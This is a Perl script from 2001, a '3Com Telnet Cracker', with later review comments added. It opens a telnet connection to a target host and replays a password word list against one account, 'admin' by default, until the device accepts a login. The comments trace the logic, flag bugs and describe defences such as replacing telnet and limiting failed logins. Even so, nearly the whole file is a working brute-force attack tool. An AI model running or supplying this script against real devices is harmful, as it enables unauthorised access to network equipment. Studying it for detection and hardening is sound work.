#!/usr/bin/perl -w
########################################################
#                                                      #
#   3Com Telnet Cracker v0.1b                          #
#   -------------------------                          #
#                                                      #
#   Telnet implementation according to RFC 854         #
#                                                      #
#   written 2001 by Siberian [www.sentry-labs.com]     #
#                                                      #
#   Tested with:                                       #
#     Active Perl (Windows NT)                         #
#     Perl 5.stable (Slackware 3.6 & 7.1)              #
#                                                      #
#   This Software is published under GPL v2            #
#                                                      #
#   FOR EDUCATIONAL PURPOSE ONLY!                      #
#                                                      #
#   SRL can't be held responsible for any damage       #
#   caused by the software, directly or indirectly,    #
#   to anything or anyone.                             #
#                                                      #
########################################################
#
# Summary: opens one TCP connection to port 23 of the given host and replays
# every line of a word list as the password for a single username (default
# "admin"), deciding what to send from the first matching prompt byte.
#
# NOTE(review): despite the banner, nothing below handles telnet option
# negotiation (IAC sequences); incoming bytes are only scanned for the
# letters "L", "P" and "M".
#
# Defensive reading: on the wire this is a long run of failed logins for one
# account inside a single cleartext telnet session from one source address.
# The usual countermeasures apply to the management interface: replace
# telnet with an encrypted management protocol, restrict who can reach
# TCP/23, change default account passwords, and log and limit failed logins
# where the device supports it.
#
# NOTE(review): there is no "use strict"; every variable is a package global
# and guesspass() exchanges state with the main program through them.

use Socket;

# guesspass - run the word list against the already-connected socket.
#
# Takes no arguments. Reads the globals $userf (username) and $ol (last
# byte received), the socket handle SOCK and the word-list handle FILE1,
# all set up by the main program. Exits the process with status 0 on the
# first password after which the "M" byte is seen; otherwise prints a
# failure message and returns once the word list is exhausted.
sub guesspass {
    $i=1;
    $userh = $userf;                              # keep a copy without CR LF for the result message
    $userf = join '', $userf, chr(13), chr(10);   # username as sent: terminated with CR LF

    # Skip incoming bytes until one of the three marker letters arrives.
    # Presumably "L" = login prompt, "P" = password prompt and "M" = the
    # post-login screen -- the device output is not visible here; confirm.
    # NOTE(review): the result of recv() is never checked, so these skip
    # loops have no exit if the peer closes the connection -- a device that
    # drops the session after repeated failures stalls the script here.
    recv(SOCK,$ol,1,0);
    while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
        recv(SOCK,$ol,1,0);
    }

    # One candidate password per word-list line.
    while(defined($passwd = <FILE1>)) {
        chop($passwd);   # removes the last character, whatever it is
        print ".";       # progress marker

        # $i counts 1 -> 2 -> 3, so this body runs twice per candidate:
        # with the prompts in the expected order, one pass answers the
        # login prompt and the next answers the password prompt.
        while($i != 3) {
            if($ol eq "L"){
                send(SOCK,$userf,0);
            }
            if($ol eq "P") {
                $passwd = join '', $passwd, chr(13), chr(10);
                send(SOCK,$passwd,0);
            }

            # Read ahead to the next marker letter (same skip loop as above).
            recv(SOCK,$ol,1,0);
            while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
                recv(SOCK,$ol,1,0);
            }

            # "M" is treated as success; the printed password still carries
            # the CR LF appended above.
            if($ol eq "M") {
                print "\n\nPassword for $userh is $passwd\n";
                exit 0;
            }
            $i++
        }
        $i=1;   # reset the two-step counter for the next candidate
    }
    print "\n\nIt's sad but true, you failed.\n";
}

# ---- main program ----

print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
print "Get the latest Version at www.sentry-labs.com\n\n";

# Positional arguments: host, word-list path, optional username.
$remote = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$passf = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$userf = shift || ($userf = "admin");   # falls back to the account name "admin"

# Resolve the host and open a TCP connection to port 23 (telnet).
$iaddr = inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iaddr);
$prot = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!";
connect(SOCK, $paddr) || die "Can't connect to target host!";

# NOTE(review): two-argument open on a path taken from the command line;
# leading or trailing characters such as ">" or "|" in the argument are
# interpreted as an open mode. The three-argument form with an explicit
# '<' mode avoids that.
open(FILE1, "$passf") || die "Can't open Password list!";

# Read one byte, then send LF CR LF -- presumably to make the device print
# its login prompt; confirm against the device's behaviour.
recv(SOCK,$ol,1,0);
$bs = join '', chr(10),chr(13),chr(10);
send(SOCK, $bs, 0);

guesspass();

# Reached only when no candidate was accepted (guesspass exits on success).
close(FILE1);
close(SOCK);
exit 0;